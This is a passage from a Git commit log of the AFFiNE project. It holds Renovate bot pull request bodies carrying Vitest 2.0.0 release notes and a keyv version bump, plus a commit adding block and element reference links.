- Implement several `userEvent` methods, add `fill` and `dragAndDrop` events - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5882 ](https://togithub.com/vitest-dev/vitest/issues/5882 ) [<samp>(4dbea)</samp>](https://togithub.com/vitest-dev/vitest/commit/4dbea4aed )
- Introduce `expect.dom` method and bundle `jest-dom` matchers with `@vitest/browser` - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5910 ](https://togithub.com/vitest-dev/vitest/issues/5910 ) [<samp>(3a96a)</samp>](https://togithub.com/vitest-dev/vitest/commit/3a96a3d0e )
- Expose CDP in the browser - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5938 ](https://togithub.com/vitest-dev/vitest/issues/5938 ) [<samp>(bec43)</samp>](https://togithub.com/vitest-dev/vitest/commit/bec434cb6 )
- Add "init" command for browser tests - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5960 ](https://togithub.com/vitest-dev/vitest/issues/5960 ) [<samp>(49e97)</samp>](https://togithub.com/vitest-dev/vitest/commit/49e973cb9 )
- Add an option to take screenshots if the browser test fails - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5975 ](https://togithub.com/vitest-dev/vitest/issues/5975 ) [<samp>(154cb)</samp>](https://togithub.com/vitest-dev/vitest/commit/154cb22de )
- Add `tripleClick` to interactive api - by [@​userquin](https://togithub.com/userquin ) in [https://github.com/vitest-dev/vitest/issues/5987 ](https://togithub.com/vitest-dev/vitest/issues/5987 ) [<samp>(200a4)</samp>](https://togithub.com/vitest-dev/vitest/commit/200a4349a )
- Playwright provider doesn't allow resizing the browser viewport - by [@​userquin](https://togithub.com/userquin ) and [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5984 ](https://togithub.com/vitest-dev/vitest/issues/5984 ) [<samp>(ff978)</samp>](https://togithub.com/vitest-dev/vitest/commit/ff978e58d )
- Pretty print diffs coming from cause - by [@​dubzzz](https://togithub.com/dubzzz ) in [https://github.com/vitest-dev/vitest/issues/5660 ](https://togithub.com/vitest-dev/vitest/issues/5660 ) [<samp>(6faf8)</samp>](https://togithub.com/vitest-dev/vitest/commit/6faf8f84b )
- Allow import statement as vi.mock path for better IDE support - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5690 ](https://togithub.com/vitest-dev/vitest/issues/5690 ) [<samp>(a99a1)</samp>](https://togithub.com/vitest-dev/vitest/commit/a99a14c1c )
- Remove deprecated options - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5696 ](https://togithub.com/vitest-dev/vitest/issues/5696 ) [<samp>(5c308)</samp>](https://togithub.com/vitest-dev/vitest/commit/5c308edc6 )
- Add blob reporter - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5663 ](https://togithub.com/vitest-dev/vitest/issues/5663 ) [<samp>(e2053)</samp>](https://togithub.com/vitest-dev/vitest/commit/e20538a36 )
- ✅ Run Vitest in separate processes with `--reporter=blob` flag to generate reports and combine them with `vitest --merge-reports` later!
- Add expect.poll utility - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5708 ](https://togithub.com/vitest-dev/vitest/issues/5708 ) [<samp>(e2e0f)</samp>](https://togithub.com/vitest-dev/vitest/commit/e2e0ff46a )
- Add browser.ui option - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5771 ](https://togithub.com/vitest-dev/vitest/issues/5771 ) [<samp>(a5033)</samp>](https://togithub.com/vitest-dev/vitest/commit/a50330eea )
- Add median to `--output-json` - by [@​Joristdh](https://togithub.com/Joristdh ) in [https://github.com/vitest-dev/vitest/issues/5745 ](https://togithub.com/vitest-dev/vitest/issues/5745 ) [<samp>(0766b)</samp>](https://togithub.com/vitest-dev/vitest/commit/0766b7f72 )
- Allow augmenting config.test.env - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5784 ](https://togithub.com/vitest-dev/vitest/issues/5784 ) [<samp>(b2469)</samp>](https://togithub.com/vitest-dev/vitest/commit/b24691efd )
- Implement module mocking in browser mode - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5765 ](https://togithub.com/vitest-dev/vitest/issues/5765 ) [<samp>(7b2f6)</samp>](https://togithub.com/vitest-dev/vitest/commit/7b2f64cfa )
- Allow configuring expect options in the config - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5729 ](https://togithub.com/vitest-dev/vitest/issues/5729 ) [<samp>(fc53f)</samp>](https://togithub.com/vitest-dev/vitest/commit/fc53f5634 )
- Add an option to print console stack trace - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5720 ](https://togithub.com/vitest-dev/vitest/issues/5720 ) [<samp>(e4fe6)</samp>](https://togithub.com/vitest-dev/vitest/commit/e4fe6f51a )
- Add browser frame to UI - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5808 ](https://togithub.com/vitest-dev/vitest/issues/5808 ) [<samp>(3796d)</samp>](https://togithub.com/vitest-dev/vitest/commit/3796dd7e0 )
- Image type add bmp - by **btea** in [https://github.com/vitest-dev/vitest/issues/5921 ](https://togithub.com/vitest-dev/vitest/issues/5921 ) [<samp>(98f9b)</samp>](https://togithub.com/vitest-dev/vitest/commit/98f9b7ab9 )
- Add an option to return base64 from page.screenshot - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5993 ](https://togithub.com/vitest-dev/vitest/issues/5993 ) [<samp>(be323)</samp>](https://togithub.com/vitest-dev/vitest/commit/be3231763 )
- Expose `parseAst`, `parseAstAsync` from vite - by [@​sheremet-va](https://togithub.com/sheremet-va ) [<samp>(f645e)</samp>](https://togithub.com/vitest-dev/vitest/commit/f645e48c5 )
- **config**:
- Allow percentage value for workers option - by [@​syi0808](https://togithub.com/syi0808 ) in [https://github.com/vitest-dev/vitest/issues/5982 ](https://togithub.com/vitest-dev/vitest/issues/5982 ) [<samp>(b1a27)</samp>](https://togithub.com/vitest-dev/vitest/commit/b1a27d404 )
- **runner**:
- Implement `test.for` - by [@​hi-ogawa](https://togithub.com/hi-ogawa ) and [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5861 ](https://togithub.com/vitest-dev/vitest/issues/5861 ) [<samp>(c2380)</samp>](https://togithub.com/vitest-dev/vitest/commit/c238072fd )
- **spy**:
- Collect mock.contexts - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5955 ](https://togithub.com/vitest-dev/vitest/issues/5955 ) [<samp>(3b31a)</samp>](https://togithub.com/vitest-dev/vitest/commit/3b31a56d5 )
- **ui**:
- Render tests in a tree - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5807 ](https://togithub.com/vitest-dev/vitest/issues/5807 ) [<samp>(7900f)</samp>](https://togithub.com/vitest-dev/vitest/commit/7900f9f89 )
- Load module graph on tab selection - by [@​userquin](https://togithub.com/userquin ) in [https://github.com/vitest-dev/vitest/issues/5844 ](https://togithub.com/vitest-dev/vitest/issues/5844 ) [<samp>(b117e)</samp>](https://togithub.com/vitest-dev/vitest/commit/b117e8756 )
- Replace navigation tree with test explorer - by [@​userquin](https://togithub.com/userquin ) in [https://github.com/vitest-dev/vitest/issues/5907 ](https://togithub.com/vitest-dev/vitest/issues/5907 ) [<samp>(45dfc)</samp>](https://togithub.com/vitest-dev/vitest/commit/45dfc95ae )
- Add initializing explorer logic - by [@​userquin](https://togithub.com/userquin ) in [https://github.com/vitest-dev/vitest/issues/5941 ](https://togithub.com/vitest-dev/vitest/issues/5941 ) [<samp>(c31c4)</samp>](https://togithub.com/vitest-dev/vitest/commit/c31c41c72 )
- Add action to explorer item to show the test/suite line in the source code tab - by [@​userquin](https://togithub.com/userquin ) and **Anjorin Damilare** in [https://github.com/vitest-dev/vitest/issues/5948 ](https://togithub.com/vitest-dev/vitest/issues/5948 ) [<samp>(7ec29)</samp>](https://togithub.com/vitest-dev/vitest/commit/7ec298eb3 )
- **ws-client**:
- Allow change reactive for state, filesMap and idMap - by [@​userquin](https://togithub.com/userquin ) in [https://github.com/vitest-dev/vitest/issues/5906 ](https://togithub.com/vitest-dev/vitest/issues/5906 ) [<samp>(e6020)</samp>](https://togithub.com/vitest-dev/vitest/commit/e6020b9c2 )
##### 🐞 Bug Fixes
- Print console statements in vmThreads - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5678 ](https://togithub.com/vitest-dev/vitest/issues/5678 ) [<samp>(34a80)</samp>](https://togithub.com/vitest-dev/vitest/commit/34a80b392 )
- Repeatable `--exclude` option - by [@​fregante](https://togithub.com/fregante ) in [https://github.com/vitest-dev/vitest/issues/5782 ](https://togithub.com/vitest-dev/vitest/issues/5782 ) [<samp>(d6700)</samp>](https://togithub.com/vitest-dev/vitest/commit/d6700bbd8 )
- Remove browser.fileParallelism - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5790 ](https://togithub.com/vitest-dev/vitest/issues/5790 ) [<samp>(b881e)</samp>](https://togithub.com/vitest-dev/vitest/commit/b881e88b2 )
- Install UI icons - by [@​sheremet-va](https://togithub.com/sheremet-va ) [<samp>(b84f1)</samp>](https://togithub.com/vitest-dev/vitest/commit/b84f1721d )
- Remove process.exit if workspace project failed to be created - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5804 ](https://togithub.com/vitest-dev/vitest/issues/5804 ) [<samp>(a820e)</samp>](https://togithub.com/vitest-dev/vitest/commit/a820e7ac6 )
- Vi.waitFor/vi.waitUntil interval is now cleared after it times out - by [@​pedro00dk](https://togithub.com/pedro00dk ) in [https://github.com/vitest-dev/vitest/issues/5875 ](https://togithub.com/vitest-dev/vitest/issues/5875 ) [<samp>(04107)</samp>](https://togithub.com/vitest-dev/vitest/commit/041076e7c )
- ToJSON recursive error serialization - by [@​eddienubes](https://togithub.com/eddienubes ) in [https://github.com/vitest-dev/vitest/issues/5848 ](https://togithub.com/vitest-dev/vitest/issues/5848 ) and [https://github.com/vitest-dev/vitest/issues/5884 ](https://togithub.com/vitest-dev/vitest/issues/5884 ) [<samp>(8d55d)</samp>](https://togithub.com/vitest-dev/vitest/commit/8d55d6bd4 )
- Print error properties only in verbose reporter - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5917 ](https://togithub.com/vitest-dev/vitest/issues/5917 ) [<samp>(2bd8d)</samp>](https://togithub.com/vitest-dev/vitest/commit/2bd8d9d6f )
- Use TTY reporter when running in Deno - by [@​marvinhagemeister](https://togithub.com/marvinhagemeister ) in [https://github.com/vitest-dev/vitest/issues/5972 ](https://togithub.com/vitest-dev/vitest/issues/5972 ) [<samp>(e0f45)</samp>](https://togithub.com/vitest-dev/vitest/commit/e0f45cb57 )
- Don't override uppercase - by [@​sheremet-va](https://togithub.com/sheremet-va ) [<samp>(caef4)</samp>](https://togithub.com/vitest-dev/vitest/commit/caef40a0b )
- Clear screen and scrollback on iTerm2 - by [@​kxalex](https://togithub.com/kxalex ) in [https://github.com/vitest-dev/vitest/issues/5978 ](https://togithub.com/vitest-dev/vitest/issues/5978 ) [<samp>(d7f23)</samp>](https://togithub.com/vitest-dev/vitest/commit/d7f23d08c )
- Include pretty-format in [@​vitest/runner](https://togithub.com/vitest/runner ) for optimization on npm - by [@​sheremet-va](https://togithub.com/sheremet-va ) [<samp>(42bd4)</samp>](https://togithub.com/vitest-dev/vitest/commit/42bd4a259 )
- Transpile esnext to node18 to support newest JS and TS features - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/4409 ](https://togithub.com/vitest-dev/vitest/issues/4409 ) [<samp>(8f65a)</samp>](https://togithub.com/vitest-dev/vitest/commit/8f65ae906 )
- **api**:
- Correct `project.provide` type - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5959 ](https://togithub.com/vitest-dev/vitest/issues/5959 ) [<samp>(0eda9)</samp>](https://togithub.com/vitest-dev/vitest/commit/0eda99de9 )
- Don't call process.exit manually - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5926 ](https://togithub.com/vitest-dev/vitest/issues/5926 ) [<samp>(e9b63)</samp>](https://togithub.com/vitest-dev/vitest/commit/e9b638d40 )
- **browser**:
- Display UI - by [@​sheremet-va](https://togithub.com/sheremet-va ) [<samp>(d41e4)</samp>](https://togithub.com/vitest-dev/vitest/commit/d41e46a81 )
- Browser actions icons colors - by [@​userquin](https://togithub.com/userquin ) in [https://github.com/vitest-dev/vitest/issues/5816 ](https://togithub.com/vitest-dev/vitest/issues/5816 ) [<samp>(f9d9b)</samp>](https://togithub.com/vitest-dev/vitest/commit/f9d9b3bef )
- Restore the original viewport when unselecting the preset viewport - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5821 ](https://togithub.com/vitest-dev/vitest/issues/5821 ) [<samp>(5ebb3)</samp>](https://togithub.com/vitest-dev/vitest/commit/5ebb3abf5 )
- Don't get stuck after the manual page refresh - by [@​sheremet-va](https://togithub.com/sheremet-va ) [<samp>(2220b)</samp>](https://togithub.com/vitest-dev/vitest/commit/2220bb3fe )
- Use iframe id instead of calculating it from filenames - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5823 ](https://togithub.com/vitest-dev/vitest/issues/5823 ) [<samp>(34a31)</samp>](https://togithub.com/vitest-dev/vitest/commit/34a310da1 )
- Always clean up iframes on rerun - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5827 ](https://togithub.com/vitest-dev/vitest/issues/5827 ) [<samp>(087fa)</samp>](https://togithub.com/vitest-dev/vitest/commit/087fa87c3 )
- Support [@​testing-library/vue](https://togithub.com/testing-library/vue ) in browser mode out of the box - by [@​sheremet-va](https://togithub.com/sheremet-va ) [<samp>(76b82)</samp>](https://togithub.com/vitest-dev/vitest/commit/76b82e5b9 )
- Print correct transformed module graph - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5833 ](https://togithub.com/vitest-dev/vitest/issues/5833 ) [<samp>(a7581)</samp>](https://togithub.com/vitest-dev/vitest/commit/a75815756 )
- Use `preview` provider when running in StackBlitz - by [@​userquin](https://togithub.com/userquin ) in [https://github.com/vitest-dev/vitest/issues/5836 ](https://togithub.com/vitest-dev/vitest/issues/5836 ) [<samp>(76e13)</samp>](https://togithub.com/vitest-dev/vitest/commit/76e13587c )
- Specify entries for correct deps optimization - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5839 ](https://togithub.com/vitest-dev/vitest/issues/5839 ) [<samp>(c79b3)</samp>](https://togithub.com/vitest-dev/vitest/commit/c79b3f1f9 )
- Allow iframe to load even if there is a custom CSP header - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5841 ](https://togithub.com/vitest-dev/vitest/issues/5841 ) [<samp>(caaaf)</samp>](https://togithub.com/vitest-dev/vitest/commit/caaafd903 )
- Don't optimize Vitest dependencies - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5843 ](https://togithub.com/vitest-dev/vitest/issues/5843 ) [<samp>(f15b4)</samp>](https://togithub.com/vitest-dev/vitest/commit/f15b4e99d )
- Set server.open to false and move error handling after init - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5845 ](https://togithub.com/vitest-dev/vitest/issues/5845 ) [<samp>(47003)</samp>](https://togithub.com/vitest-dev/vitest/commit/470036794 )
- Show correct prepare time - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5852 ](https://togithub.com/vitest-dev/vitest/issues/5852 ) [<samp>(52d54)</samp>](https://togithub.com/vitest-dev/vitest/commit/52d545bf9 )
- Resolve `coverage.reporter` from string values - by [@​AriPerkkio](https://togithub.com/AriPerkkio ) in [https://github.com/vitest-dev/vitest/issues/5920 ](https://togithub.com/vitest-dev/vitest/issues/5920 ) [<samp>(f33da)</samp>](https://togithub.com/vitest-dev/vitest/commit/f33dabbef )
- Correctly update inline snapshot if changed - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5925 ](https://togithub.com/vitest-dev/vitest/issues/5925 ) [<samp>(2380c)</samp>](https://togithub.com/vitest-dev/vitest/commit/2380cb95e )
- Remove "util" warning - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5935 ](https://togithub.com/vitest-dev/vitest/issues/5935 ) [<samp>(48f28)</samp>](https://togithub.com/vitest-dev/vitest/commit/48f28f731 )
- Remove hacky retry - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5971 ](https://togithub.com/vitest-dev/vitest/issues/5971 ) [<samp>(2a2c9)</samp>](https://togithub.com/vitest-dev/vitest/commit/2a2c9085a )
- Make userEvent more stable when running in parallel - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5974 ](https://togithub.com/vitest-dev/vitest/issues/5974 ) [<samp>(14a21)</samp>](https://togithub.com/vitest-dev/vitest/commit/14a217d53 )
- Print screenshot path alongside the test error message - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5992 ](https://togithub.com/vitest-dev/vitest/issues/5992 ) [<samp>(15289)</samp>](https://togithub.com/vitest-dev/vitest/commit/152891b3d )
- Print correct stack trace in source files - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6003 ](https://togithub.com/vitest-dev/vitest/issues/6003 ) [<samp>(62aa7)</samp>](https://togithub.com/vitest-dev/vitest/commit/62aa72081 )
- Correctly mock optimized cjs dependencies - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6035 ](https://togithub.com/vitest-dev/vitest/issues/6035 ) [<samp>(057b4)</samp>](https://togithub.com/vitest-dev/vitest/commit/057b4f34b )
- Support shadow root and svg elements - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6036 ](https://togithub.com/vitest-dev/vitest/issues/6036 ) [<samp>(2e3c8)</samp>](https://togithub.com/vitest-dev/vitest/commit/2e3c872ae )
- **coverage**:
- Clean up empty coverage reports directory - by [@​AriPerkkio](https://togithub.com/AriPerkkio ) in [https://github.com/vitest-dev/vitest/issues/5731 ](https://togithub.com/vitest-dev/vitest/issues/5731 ) [<samp>(c469c)</samp>](https://togithub.com/vitest-dev/vitest/commit/c469c74d7 )
- `thresholds.autoUpdate` to support `mergeConfig` - by [@​AriPerkkio](https://togithub.com/AriPerkkio ) in [https://github.com/vitest-dev/vitest/issues/5818 ](https://togithub.com/vitest-dev/vitest/issues/5818 ) [<samp>(7afb3)</samp>](https://togithub.com/vitest-dev/vitest/commit/7afb3682f )
- Pass thresholds errors to `stderr` of `startVitest()` - by [@​AriPerkkio](https://togithub.com/AriPerkkio ) in [https://github.com/vitest-dev/vitest/issues/5954 ](https://togithub.com/vitest-dev/vitest/issues/5954 ) [<samp>(70805)</samp>](https://togithub.com/vitest-dev/vitest/commit/708051319 )
- Exclude bench files from coverage - by [@​kouak](https://togithub.com/kouak ) in [https://github.com/vitest-dev/vitest/issues/5983 ](https://togithub.com/vitest-dev/vitest/issues/5983 ) [<samp>(429e1)</samp>](https://togithub.com/vitest-dev/vitest/commit/429e1a7f8 )
- Vite to ignore dynamic import of provider - by [@​AriPerkkio](https://togithub.com/AriPerkkio ) in [https://github.com/vitest-dev/vitest/issues/5998 ](https://togithub.com/vitest-dev/vitest/issues/5998 ) [<samp>(6d884)</samp>](https://togithub.com/vitest-dev/vitest/commit/6d8848e86 )
- Istanbul to support import attributes - by [@​Gravitonic](https://togithub.com/Gravitonic ) in [https://github.com/vitest-dev/vitest/issues/6006 ](https://togithub.com/vitest-dev/vitest/issues/6006 ) [<samp>(2898a)</samp>](https://togithub.com/vitest-dev/vitest/commit/2898a525d )
- Remove work-around for implicit `else` - by [@​AriPerkkio](https://togithub.com/AriPerkkio ) in [https://github.com/vitest-dev/vitest/issues/6014 ](https://togithub.com/vitest-dev/vitest/issues/6014 ) [<samp>(368c1)</samp>](https://togithub.com/vitest-dev/vitest/commit/368c13728 )
- **deps**:
- Update dependency [@​testing-library/dom](https://togithub.com/testing-library/dom ) to v10 - by **renovate\[bot]** in [https://github.com/vitest-dev/vitest/issues/5866 ](https://togithub.com/vitest-dev/vitest/issues/5866 ) [<samp>(e9745)</samp>](https://togithub.com/vitest-dev/vitest/commit/e9745997e )
- Update vulnerable `test-exclude` to v7 - by [@​AriPerkkio](https://togithub.com/AriPerkkio ) in [https://github.com/vitest-dev/vitest/issues/5867 ](https://togithub.com/vitest-dev/vitest/issues/5867 ) [<samp>(0a715)</samp>](https://togithub.com/vitest-dev/vitest/commit/0a715946b )
- **expect**:
- Fix immutable.js iterable equality - by [@​hi-ogawa](https://togithub.com/hi-ogawa ) in [https://github.com/vitest-dev/vitest/issues/5692 ](https://togithub.com/vitest-dev/vitest/issues/5692 ) [<samp>(1532c)</samp>](https://togithub.com/vitest-dev/vitest/commit/1532c19a0 )
- **forks**:
- Resolve `poolOptions.<name>.isolate` from `forks` options - by [@​AriPerkkio](https://togithub.com/AriPerkkio ) in [https://github.com/vitest-dev/vitest/issues/5840 ](https://togithub.com/vitest-dev/vitest/issues/5840 ) [<samp>(a60a1)</samp>](https://togithub.com/vitest-dev/vitest/commit/a60a140ef )
- **runner**:
- Ensure inner suite { sequential: true } correctly overrides outer suite { concurrent: true } - by [@​pengooseDev](https://togithub.com/pengooseDev ) in [https://github.com/vitest-dev/vitest/issues/5737 ](https://togithub.com/vitest-dev/vitest/issues/5737 ) [<samp>(a20e7)</samp>](https://togithub.com/vitest-dev/vitest/commit/a20e75b89 )
- Ensure test.each print -0 and -NaN properly - by [@​pengooseDev](https://togithub.com/pengooseDev ) in [https://github.com/vitest-dev/vitest/issues/5806 ](https://togithub.com/vitest-dev/vitest/issues/5806 ) [<samp>(9ac8f)</samp>](https://togithub.com/vitest-dev/vitest/commit/9ac8ff9bd )
- **snapshot**:
- Fix `toMatchFileSnapshot` with empty file - by [@​hi-ogawa](https://togithub.com/hi-ogawa ) in [https://github.com/vitest-dev/vitest/issues/5894 ](https://togithub.com/vitest-dev/vitest/issues/5894 ) [<samp>(88006)</samp>](https://togithub.com/vitest-dev/vitest/commit/8800601d2 )
- **spy**:
- Correctly track constructor's "this" type - by [@​sheremet-va](https://togithub.com/sheremet-va ) [<samp>(4776e)</samp>](https://togithub.com/vitest-dev/vitest/commit/4776eca1d )
- **types**:
- Mark pool options as not available in project config - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5934 ](https://togithub.com/vitest-dev/vitest/issues/5934 ) [<samp>(486fd)</samp>](https://togithub.com/vitest-dev/vitest/commit/486fd1169 )
- **ui**:
- Show correct module graph and project name in a Vitest workspace - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5792 ](https://togithub.com/vitest-dev/vitest/issues/5792 ) [<samp>(48c50)</samp>](https://togithub.com/vitest-dev/vitest/commit/48c502fbe )
- Update running todo tests inside todo suites (each) - by [@​userquin](https://togithub.com/userquin ) in [https://github.com/vitest-dev/vitest/issues/5939 ](https://togithub.com/vitest-dev/vitest/issues/5939 ) [<samp>(63ae1)</samp>](https://togithub.com/vitest-dev/vitest/commit/63ae10bd9 )
- `FileDetails` title status icon not being updated - by [@​userquin](https://togithub.com/userquin ) in [https://github.com/vitest-dev/vitest/issues/5942 ](https://togithub.com/vitest-dev/vitest/issues/5942 ) [<samp>(e9ddf)</samp>](https://togithub.com/vitest-dev/vitest/commit/e9ddf9ce2 )
- **ui, browser**:
- Disable mouse events when resizing main navigation panel - by [@​userquin](https://togithub.com/userquin ) in [https://github.com/vitest-dev/vitest/issues/5863 ](https://togithub.com/vitest-dev/vitest/issues/5863 ) [<samp>(7cbd9)</samp>](https://togithub.com/vitest-dev/vitest/commit/7cbd943c7 )
- **utils**:
- Produce valid snapshot names - by [@​dubzzz](https://togithub.com/dubzzz ) in [https://github.com/vitest-dev/vitest/issues/5724 ](https://togithub.com/vitest-dev/vitest/issues/5724 ) [<samp>(1ec61)</samp>](https://togithub.com/vitest-dev/vitest/commit/1ec61ceee )
- Fix color util maximum call stack error - by [@​hi-ogawa](https://togithub.com/hi-ogawa ) in [https://github.com/vitest-dev/vitest/issues/5733 ](https://togithub.com/vitest-dev/vitest/issues/5733 ) [<samp>(a4ec5)</samp>](https://togithub.com/vitest-dev/vitest/commit/a4ec58319 )
- Package exports - by [@​userquin](https://togithub.com/userquin ) in [https://github.com/vitest-dev/vitest/issues/5847 ](https://togithub.com/vitest-dev/vitest/issues/5847 ) [<samp>(07876)</samp>](https://togithub.com/vitest-dev/vitest/commit/07876b7e0 )
- **vite-node**:
- Expose all envs from .env file, not just with a prefix `VITE_` - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6017 ](https://togithub.com/vitest-dev/vitest/issues/6017 ) [<samp>(d87be)</samp>](https://togithub.com/vitest-dev/vitest/commit/d87bef961 )
- **vitest**:
- Expose `provide` to the public API - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5897 ](https://togithub.com/vitest-dev/vitest/issues/5897 ) [<samp>(66e64)</samp>](https://togithub.com/vitest-dev/vitest/commit/66e648ff8 )
- Cache fs code only for forks pool - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5909 ](https://togithub.com/vitest-dev/vitest/issues/5909 ) [<samp>(e30d9)</samp>](https://togithub.com/vitest-dev/vitest/commit/e30d9b4d5 )
- Allow testing unandled rejection/exception - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6016 ](https://togithub.com/vitest-dev/vitest/issues/6016 ) [<samp>(c8d56)</samp>](https://togithub.com/vitest-dev/vitest/commit/c8d56fe5f )
- Show all failed tests when rerunning a test - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6022 ](https://togithub.com/vitest-dev/vitest/issues/6022 ) [<samp>(91ba6)</samp>](https://togithub.com/vitest-dev/vitest/commit/91ba6f95e )
##### [View changes on GitHub](6b29f3ddc8 ...v2.0.0)
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about these updates again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy40MjUuMSIsInVwZGF0ZWRJblZlciI6IjM4LjU2LjAiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19-->
2024-09-03 10:02:02 +00:00
fundon
98d9295259
feat(core): support block or element reference links ( #7946 )
...
Upstreams: https://github.com/toeverything/blocksuite/pull/8021
* open doc with mode
* monitor mode changes in query string
* scroll anchoring
https://github.com/user-attachments/assets/681abff8-e51b-47ea-bb71-447e8b312142
https://github.com/user-attachments/assets/e73ed4c0-4e33-45f8-9db4-d8eed3525d05
2024-09-03 09:49:15 +00:00
renovate
e7b53641d7
chore: bump up keyv version to v5 ( #7936 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [keyv](https://togithub.com/jaredwray/keyv ) | [`^4.5.4` -> `^5.0.0`](https://renovatebot.com/diffs/npm/keyv/4.5.4/5.0.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
